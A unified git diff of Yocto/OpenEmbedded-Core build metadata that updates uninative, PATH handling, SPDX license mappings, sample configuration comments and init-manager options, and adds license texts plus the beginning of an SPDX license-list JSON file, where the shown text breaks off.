# to the distro running on the build machine.
#
-UNINATIVE_MAXGLIBCVERSION = "2.32"
+UNINATIVE_MAXGLIBCVERSION = "2.39"
+UNINATIVE_VERSION = "4.4"
-UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/2.9/"
-UNINATIVE_CHECKSUM[aarch64] ?= "9f25a667aee225b1dd65c4aea73e01983e825b1cb9b56937932a1ee328b45f81"
-UNINATIVE_CHECKSUM[i686] ?= "cae5d73245d95b07cf133b780ba3f6c8d0adca3ffc4e7e7fab999961d5e24d36"
-UNINATIVE_CHECKSUM[x86_64] ?= "d07916b95c419c81541a19c8ef0ed8cbd78ae18437ff28a4c8a60ef40518e423"
+UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/${UNINATIVE_VERSION}/"
+UNINATIVE_CHECKSUM[aarch64] ?= "b61876130f494f75092f21086b4a64ea5fb064045769bf1d32e9cb6af17ea8ec"
+UNINATIVE_CHECKSUM[i686] ?= "9f28627828f0082cc0344eede4d9a861a9a064bfa8f36e072e46212f0fe45fcc"
+UNINATIVE_CHECKSUM[x86_64] ?= "d81c54284be2bb886931fc87281d58177a2cd381cf99d1981f8923039a72a302"
diff --git a/meta/conf/layer.conf b/meta/conf/layer.conf
index 0249f21d07..7453655417 100644
--- a/meta/conf/layer.conf
+++ b/meta/conf/layer.conf
@@ -100,4 +100,6 @@ SSTATE_EXCLUDEDEPS_SYSROOT += "\
SSTATE_EXCLUDEDEPS_SYSROOT += ".*->autoconf-archive-native"
# We need to keep bitbake tools in PATH
-PATH := "${@os.path.dirname(bb.utils.which(d.getVar('PATH'),'bitbake'))}:${HOSTTOOLS_DIR}"
+# Avoid empty path entries
+BITBAKEPATH := "${@os.path.dirname(bb.utils.which(d.getVar('PATH'),'bitbake'))}"
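+# (BITBAKEPATH evaluates to an empty string when bitbake is not found on the current PATH)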
+PATH := "${@'${BITBAKEPATH}:' if '${BITBAKEPATH}' != '' else ''}${HOSTTOOLS_DIR}"
diff --git a/meta/conf/licenses.conf b/meta/conf/licenses.conf
index 5b309eb385..c78823e847 100644
--- a/meta/conf/licenses.conf
+++ b/meta/conf/licenses.conf
@@ -13,24 +13,39 @@
SPDXLICENSEMAP[AGPL-3] = "AGPL-3.0"
SPDXLICENSEMAP[AGPLv3] = "AGPL-3.0"
SPDXLICENSEMAP[AGPLv3.0] = "AGPL-3.0"
+SPDXLICENSEMAP[AGPL-3.0-only] = "AGPL-3.0"
# GPL variations
SPDXLICENSEMAP[GPL-1] = "GPL-1.0"
SPDXLICENSEMAP[GPLv1] = "GPL-1.0"
SPDXLICENSEMAP[GPLv1.0] = "GPL-1.0"
+SPDXLICENSEMAP[GPL-1.0-only] = "GPL-1.0"
SPDXLICENSEMAP[GPL-2] = "GPL-2.0"
SPDXLICENSEMAP[GPLv2] = "GPL-2.0"
+SPDXLICENSEMAP[GPLv2+] = "GPL-2.0+"
SPDXLICENSEMAP[GPLv2.0] = "GPL-2.0"
+SPDXLICENSEMAP[GPLv2.0+] = "GPL-2.0+"
+SPDXLICENSEMAP[GPL-2.0-only] = "GPL-2.0"
SPDXLICENSEMAP[GPL-3] = "GPL-3.0"
SPDXLICENSEMAP[GPLv3] = "GPL-3.0"
+SPDXLICENSEMAP[GPLv3+] = "GPL-3.0+"
SPDXLICENSEMAP[GPLv3.0] = "GPL-3.0"
+SPDXLICENSEMAP[GPLv3.0+] = "GPL-3.0+"
+SPDXLICENSEMAP[GPL-3.0-only] = "GPL-3.0"
#LGPL variations
SPDXLICENSEMAP[LGPLv2] = "LGPL-2.0"
+SPDXLICENSEMAP[LGPLv2+] = "LGPL-2.0+"
SPDXLICENSEMAP[LGPLv2.0] = "LGPL-2.0"
+SPDXLICENSEMAP[LGPLv2.0+] = "LGPL-2.0+"
+SPDXLICENSEMAP[LGPL-2.0-only] = "LGPL-2.0"
SPDXLICENSEMAP[LGPL2.1] = "LGPL-2.1"
SPDXLICENSEMAP[LGPLv2.1] = "LGPL-2.1"
+SPDXLICENSEMAP[LGPLv2.1+] = "LGPL-2.1+"
+SPDXLICENSEMAP[LGPL-2.1-only] = "LGPL-2.1"
SPDXLICENSEMAP[LGPLv3] = "LGPL-3.0"
+SPDXLICENSEMAP[LGPLv3+] = "LGPL-3.0+"
+SPDXLICENSEMAP[LGPL-3.0-only] = "LGPL-3.0"
#MPL variations
SPDXLICENSEMAP[MPL-1] = "MPL-1.0"
diff --git a/meta/conf/local.conf.sample b/meta/conf/local.conf.sample
index 783d2c4c16..e1a6be3935 100644
--- a/meta/conf/local.conf.sample
+++ b/meta/conf/local.conf.sample
@@ -167,7 +167,7 @@ PATCHRESOLVE = "noop"
#
# Monitor the disk space during the build. If there is less than 1GB of space or less
# than 100K inodes in any key build location (TMPDIR, DL_DIR, SSTATE_DIR), gracefully
-# shutdown the build. If there is less that 100MB or 1K inodes, perform a hard abort
+# shutdown the build. If there is less than 100MB or 1K inodes, perform a hard abort
# of the build. The reason for this is that running completely out of space can corrupt
# files and damages the build in ways which may not be easily recoverable.
# It's necessary to monitor /tmp; if there is no space left the build will fail
@@ -185,7 +185,7 @@ BB_DISKMON_DIRS ??= "\
#
# Shared-state files from other locations
#
-# As mentioned above, shared state files are prebuilt cache data objects which can
+# As mentioned above, shared state files are prebuilt cache data objects which can be
# used to accelerate build time. This variable can be used to configure the system
# to search other mirror locations for these objects before it builds the data itself.
#
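# As an illustrative sketch only (the server URL below is a placeholder), a
# mirror entry takes the form "<regexp match> <replacement>", for example:
#SSTATE_MIRRORS ?= "file://.* http://someserver.tld/share/sstate/PATH;downloadfilename=PATH"
#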
diff --git a/meta/conf/local.conf.sample.extended b/meta/conf/local.conf.sample.extended
index 443b4e83f9..3d9cecbc62 100644
--- a/meta/conf/local.conf.sample.extended
+++ b/meta/conf/local.conf.sample.extended
@@ -334,7 +334,7 @@
# The INITRAMFS_IMAGE image variable will cause an additional recipe to
# be built as a dependency to whatever rootfs recipe you might be
# using such as core-image-sato. The initramfs might be needed for
-# the initial boot of of the target system such as to load kernel
+# the initial boot of the target system such as to load kernel
# modules prior to mounting the root file system.
#
# INITRAMFS_IMAGE_BUNDLE variable controls if the image recipe
@@ -374,23 +374,12 @@
#
#
-# Use busybox/mdev for system initialization
+# System initialization
#
-#VIRTUAL-RUNTIME_dev_manager = "busybox-mdev"
-#VIRTUAL-RUNTIME_login_manager = "busybox"
-#VIRTUAL-RUNTIME_init_manager = "busybox"
-#VIRTUAL-RUNTIME_initscripts = "initscripts"
-#VIRTUAL-RUNTIME_keymaps = "keymaps"
-#DISTRO_FEATURES_BACKFILL_CONSIDERED += "sysvinit"
-
-#
-# Use systemd for system initialization
-#
-#DISTRO_FEATURES_append = " systemd"
-#DISTRO_FEATURES_BACKFILL_CONSIDERED += "sysvinit"
-#VIRTUAL-RUNTIME_login_manager = "shadow-base"
-#VIRTUAL-RUNTIME_init_manager = "systemd"
-#VIRTUAL-RUNTIME_initscripts = "systemd-compat-units"
+#INIT_MANAGER = "none"
+#INIT_MANAGER = "sysvinit"
+#INIT_MANAGER = "systemd"
+#INIT_MANAGER = "mdev-busybox"
#
# Use a full set of packages instead of busybox for base utils
diff --git a/meta/conf/machine/include/qemu.inc b/meta/conf/machine/include/qemu.inc
index 8dedb1a42d..7d0a6fe458 100644
--- a/meta/conf/machine/include/qemu.inc
+++ b/meta/conf/machine/include/qemu.inc
@@ -21,7 +21,7 @@ RDEPENDS_${KERNEL_PACKAGE_NAME}-base = ""
# Use a common kernel recipe for all QEMU machines
PREFERRED_PROVIDER_virtual/kernel ??= "linux-yocto"
-EXTRA_IMAGEDEPENDS += "qemu-native qemu-helper-native"
+EXTRA_IMAGEDEPENDS += "qemu-system-native qemu-helper-native"
# Provide the nfs server kernel module for all qemu images
KERNEL_FEATURES_append_pn-linux-yocto = " features/nfsd/nfsd-enable.scc"
diff --git a/meta/conf/multilib.conf b/meta/conf/multilib.conf
index d231107f8b..e9767c73b6 100644
--- a/meta/conf/multilib.conf
+++ b/meta/conf/multilib.conf
@@ -11,6 +11,8 @@ STAGING_DIR_TARGET = "${WORKDIR}/${MLPREFIX}recipe-sysroot"
RECIPE_SYSROOT = "${WORKDIR}/${MLPREFIX}recipe-sysroot"
RECIPE_SYSROOT_class-native = "${WORKDIR}/recipe-sysroot"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/${MLPREFIX}recipe-sysroot"
+
INHERIT += "multilib_global"
BBCLASSEXTEND_append = " ${MULTILIBS}"
diff --git a/meta/files/common-licenses/Spencer-94 b/meta/files/common-licenses/Spencer-94
new file mode 100644
index 0000000000..75ba7f7d2e
--- /dev/null
+++ b/meta/files/common-licenses/Spencer-94
@@ -0,0 +1,12 @@
+Copyright 1992, 1993, 1994 Henry Spencer. All rights reserved.
+This software is not subject to any license of the American Telephone and Telegraph Company or of the Regents of the University of California.
+
+Permission is granted to anyone to use this software for any purpose on any computer system, and to alter it and redistribute it, subject to the following restrictions:
+
+1. The author is not responsible for the consequences of use of this software, no matter how awful, even if they arise from flaws in it.
+
+2. The origin of this software must not be misrepresented, either by explicit claim or by omission. Since few users ever read sources, credits must appear in the documentation.
+
+3. Altered versions must be plainly marked as such, and must not be misrepresented as being the original software. Since few users ever read sources, credits must appear in the documentation.
+
+4. This notice may not be removed or altered.
diff --git a/meta/files/common-licenses/Unlicense b/meta/files/common-licenses/Unlicense
new file mode 100644
index 0000000000..68a49daad8
--- /dev/null
+++ b/meta/files/common-licenses/Unlicense
@@ -0,0 +1,24 @@
+This is free and unencumbered software released into the public domain.
+
+Anyone is free to copy, modify, publish, use, compile, sell, or
+distribute this software, either in source code form or as a compiled
+binary, for any purpose, commercial or non-commercial, and by any
+means.
+
+In jurisdictions that recognize copyright laws, the author or authors
+of this software dedicate any and all copyright interest in the
+software to the public domain. We make this dedication for the benefit
+of the public at large and to the detriment of our heirs and
+successors. We intend this dedication to be an overt act of
+relinquishment in perpetuity of all present and future rights to this
+software under copyright law.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
+OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
+ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
+OTHER DEALINGS IN THE SOFTWARE.
+
+For more information, please refer to <http://unlicense.org/>
diff --git a/meta/files/fs-perms-persistent-log.txt b/meta/files/fs-perms-persistent-log.txt
index 3a7cf3ab94..518c1be3c9 100644
--- a/meta/files/fs-perms-persistent-log.txt
+++ b/meta/files/fs-perms-persistent-log.txt
@@ -41,7 +41,7 @@ ${includedir} 0755 root root true 0644 root root
${oldincludedir} 0755 root root true 0644 root root
# Cleanup debug src
-/usr/src/debug 0755 root root true - root root
+/usr/src/debug 0755 root root true 0644 root root
# Items from base-files
# Links
diff --git a/meta/files/fs-perms.txt b/meta/files/fs-perms.txt
index c8c3ac5dbe..daa4aed840 100644
--- a/meta/files/fs-perms.txt
+++ b/meta/files/fs-perms.txt
@@ -41,7 +41,7 @@ ${includedir} 0755 root root true 0644 root root
${oldincludedir} 0755 root root true 0644 root root
# Cleanup debug src
-/usr/src/debug 0755 root root true - root root
+/usr/src/debug 0755 root root true 0644 root root
# Items from base-files
# Links
diff --git a/meta/files/spdx-licenses.json b/meta/files/spdx-licenses.json
new file mode 100644
index 0000000000..ef926164ec
--- /dev/null
+++ b/meta/files/spdx-licenses.json
@@ -0,0 +1,5937 @@
+{
+ "licenseListVersion": "3.14",
+ "licenses": [
+ {
+ "reference": "https://spdx.org/licenses/GPL-1.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-1.0.json",
+ "referenceNumber": 0,
+ "name": "GNU General Public License v1.0 only",
+ "licenseId": "GPL-1.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/bzip2-1.0.6.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/bzip2-1.0.6.json",
+ "referenceNumber": 1,
+ "name": "bzip2 and libbzip2 License v1.0.6",
+ "licenseId": "bzip2-1.0.6",
+ "seeAlso": [
+ "https://sourceware.org/git/?p\u003dbzip2.git;a\u003dblob;f\u003dLICENSE;hb\u003dbzip2-1.0.6",
+ "http://bzip.org/1.0.5/bzip2-manual-1.0.5.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Intel-ACPI.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Intel-ACPI.json",
+ "referenceNumber": 2,
+ "name": "Intel ACPI Software License Agreement",
+ "licenseId": "Intel-ACPI",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Intel_ACPI_Software_License_Agreement"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/XSkat.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/XSkat.json",
+ "referenceNumber": 3,
+ "name": "XSkat License",
+ "licenseId": "XSkat",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/XSkat_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0.json",
+ "referenceNumber": 4,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 2.0 Generic",
+ "licenseId": "CC-BY-NC-SA-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Plexus.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Plexus.json",
+ "referenceNumber": 5,
+ "name": "Plexus Classworlds License",
+ "licenseId": "Plexus",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Plexus_Classworlds_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Giftware.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Giftware.json",
+ "referenceNumber": 6,
+ "name": "Giftware License",
+ "licenseId": "Giftware",
+ "seeAlso": [
+ "http://liballeg.org/license.html#allegro-4-the-giftware-license"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BitTorrent-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BitTorrent-1.0.json",
+ "referenceNumber": 7,
+ "name": "BitTorrent Open Source License v1.0",
+ "licenseId": "BitTorrent-1.0",
+ "seeAlso": [
+ "http://sources.gentoo.org/cgi-bin/viewvc.cgi/gentoo-x86/licenses/BitTorrent?r1\u003d1.1\u0026r2\u003d1.1.1.1\u0026diff_format\u003ds"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/APSL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APSL-1.1.json",
+ "referenceNumber": 8,
+ "name": "Apple Public Source License 1.1",
+ "licenseId": "APSL-1.1",
+ "seeAlso": [
+ "http://www.opensource.apple.com/source/IOSerialFamily/IOSerialFamily-7/APPLE_LICENSE"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-GCC-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-GCC-exception.json",
+ "referenceNumber": 9,
+ "name": "GNU General Public License v2.0 w/GCC Runtime Library exception",
+ "licenseId": "GPL-2.0-with-GCC-exception",
+ "seeAlso": [
+ "https://gcc.gnu.org/git/?p\u003dgcc.git;a\u003dblob;f\u003dgcc/libgcc1.c;h\u003d762f5143fc6eed57b6797c82710f3538aa52b40b;hb\u003dcb143a3ce4fb417c68f5fa2691a1b1b1053dfba9#l10"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/UPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/UPL-1.0.json",
+ "referenceNumber": 10,
+ "name": "Universal Permissive License v1.0",
+ "licenseId": "UPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/UPL"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/wxWindows.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/wxWindows.json",
+ "referenceNumber": 11,
+ "name": "wxWindows Library License",
+ "licenseId": "wxWindows",
+ "seeAlso": [
+ "https://opensource.org/licenses/WXwindows"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Caldera.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Caldera.json",
+ "referenceNumber": 12,
+ "name": "Caldera License",
+ "licenseId": "Caldera",
+ "seeAlso": [
+ "http://www.lemis.com/grog/UNIX/ancient-source-all.pdf"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zend-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zend-2.0.json",
+ "referenceNumber": 13,
+ "name": "Zend License v2.0",
+ "licenseId": "Zend-2.0",
+ "seeAlso": [
+ "https://web.archive.org/web/20130517195954/http://www.zend.com/license/2_00.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CUA-OPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CUA-OPL-1.0.json",
+ "referenceNumber": 14,
+ "name": "CUA Office Public License v1.0",
+ "licenseId": "CUA-OPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/CUA-OPL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/JPNIC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/JPNIC.json",
+ "referenceNumber": 15,
+ "name": "Japan Network Information Center License",
+ "licenseId": "JPNIC",
+ "seeAlso": [
+ "https://gitlab.isc.org/isc-projects/bind9/blob/master/COPYRIGHT#L366"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SAX-PD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SAX-PD.json",
+ "referenceNumber": 16,
+ "name": "Sax Public Domain Notice",
+ "licenseId": "SAX-PD",
+ "seeAlso": [
+ "http://www.saxproject.org/copying.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-2.5.json",
+ "referenceNumber": 17,
+ "name": "Creative Commons Attribution No Derivatives 2.5 Generic",
+ "licenseId": "CC-BY-ND-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/eGenix.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/eGenix.json",
+ "referenceNumber": 18,
+ "name": "eGenix.com Public License 1.1.0",
+ "licenseId": "eGenix",
+ "seeAlso": [
+ "http://www.egenix.com/products/eGenix.com-Public-License-1.1.0.pdf",
+ "https://fedoraproject.org/wiki/Licensing/eGenix.com_Public_License_1.1.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPLLR.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPLLR.json",
+ "referenceNumber": 19,
+ "name": "Lesser General Public License For Linguistic Resources",
+ "licenseId": "LGPLLR",
+ "seeAlso": [
+ "http://www-igm.univ-mlv.fr/~unitex/lgpllr.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.2.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.2.json",
+ "referenceNumber": 20,
+ "name": "Open LDAP Public License 2.2.2",
+ "licenseId": "OLDAP-2.2.2",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003ddf2cc1e21eb7c160695f5b7cffd6296c151ba188"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-3.0-DE.json",
+ "referenceNumber": 21,
+ "name": "Creative Commons Attribution No Derivatives 3.0 Germany",
+ "licenseId": "CC-BY-ND-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/IPA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/IPA.json",
+ "referenceNumber": 22,
+ "name": "IPA Font License",
+ "licenseId": "IPA",
+ "seeAlso": [
+ "https://opensource.org/licenses/IPA"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NCSA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NCSA.json",
+ "referenceNumber": 23,
+ "name": "University of Illinois/NCSA Open Source License",
+ "licenseId": "NCSA",
+ "seeAlso": [
+ "http://otm.illinois.edu/uiuc_openSource",
+ "https://opensource.org/licenses/NCSA"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/W3C.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/W3C.json",
+ "referenceNumber": 24,
+ "name": "W3C Software Notice and License (2002-12-31)",
+ "licenseId": "W3C",
+ "seeAlso": [
+ "http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231.html",
+ "https://opensource.org/licenses/W3C"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Adobe-2006.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Adobe-2006.json",
+ "referenceNumber": 25,
+ "name": "Adobe Systems Incorporated Source Code License Agreement",
+ "licenseId": "Adobe-2006",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/AdobeLicense"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Net-SNMP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Net-SNMP.json",
+ "referenceNumber": 26,
+ "name": "Net-SNMP License",
+ "licenseId": "Net-SNMP",
+ "seeAlso": [
+ "http://net-snmp.sourceforge.net/about/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-4.0.json",
+ "referenceNumber": 27,
+ "name": "Creative Commons Attribution Share Alike 4.0 International",
+ "licenseId": "CC-BY-SA-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/4.0/legalcode"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/YPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/YPL-1.0.json",
+ "referenceNumber": 28,
+ "name": "Yahoo! Public License v1.0",
+ "licenseId": "YPL-1.0",
+ "seeAlso": [
+ "http://www.zimbra.com/license/yahoo_public_license_1.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Nunit.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/Nunit.json",
+ "referenceNumber": 29,
+ "name": "Nunit License",
+ "licenseId": "Nunit",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Nunit"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MITNFA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MITNFA.json",
+ "referenceNumber": 30,
+ "name": "MIT +no-false-attribs license",
+ "licenseId": "MITNFA",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MITNFA"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PHP-3.01.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PHP-3.01.json",
+ "referenceNumber": 31,
+ "name": "PHP License v3.01",
+ "licenseId": "PHP-3.01",
+ "seeAlso": [
+ "http://www.php.net/license/3_01.txt"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-Source-Code.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-Source-Code.json",
+ "referenceNumber": 32,
+ "name": "BSD Source Code Attribution",
+ "licenseId": "BSD-Source-Code",
+ "seeAlso": [
+ "https://github.com/robbiehanson/CocoaHTTPServer/blob/master/LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.5.json",
+ "referenceNumber": 33,
+ "name": "Creative Commons Attribution Share Alike 2.5 Generic",
+ "licenseId": "CC-BY-SA-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Motosoto.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Motosoto.json",
+ "referenceNumber": 34,
+ "name": "Motosoto License",
+ "licenseId": "Motosoto",
+ "seeAlso": [
+ "https://opensource.org/licenses/Motosoto"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-1.1.json",
+ "referenceNumber": 35,
+ "name": "Open Software License 1.1",
+ "licenseId": "OSL-1.1",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/OSL1.1"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NGPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NGPL.json",
+ "referenceNumber": 36,
+ "name": "Nethack General Public License",
+ "licenseId": "NGPL",
+ "seeAlso": [
+ "https://opensource.org/licenses/NGPL"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-2.5-AU.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-2.5-AU.json",
+ "referenceNumber": 37,
+ "name": "Creative Commons Attribution 2.5 Australia",
+ "licenseId": "CC-BY-2.5-AU",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/2.5/au/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Unicode-TOU.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Unicode-TOU.json",
+ "referenceNumber": 38,
+ "name": "Unicode Terms of Use",
+ "licenseId": "Unicode-TOU",
+ "seeAlso": [
+ "http://www.unicode.org/copyright.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License.json",
+ "referenceNumber": 39,
+ "name": "BSD 3-Clause No Nuclear License",
+ "licenseId": "BSD-3-Clause-No-Nuclear-License",
+ "seeAlso": [
+ "http://download.oracle.com/otn-pub/java/licenses/bsd.txt?AuthParam\u003d1467140197_43d516ce1776bd08a58235a7785be1cc"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OPUBL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OPUBL-1.0.json",
+ "referenceNumber": 40,
+ "name": "Open Publication License v1.0",
+ "licenseId": "OPUBL-1.0",
+ "seeAlso": [
+ "http://opencontent.org/openpub/",
+ "https://www.debian.org/opl",
+ "https://www.ctan.org/license/opl"
+ ],
+ "isOsiApproved": false
+ },
+ {
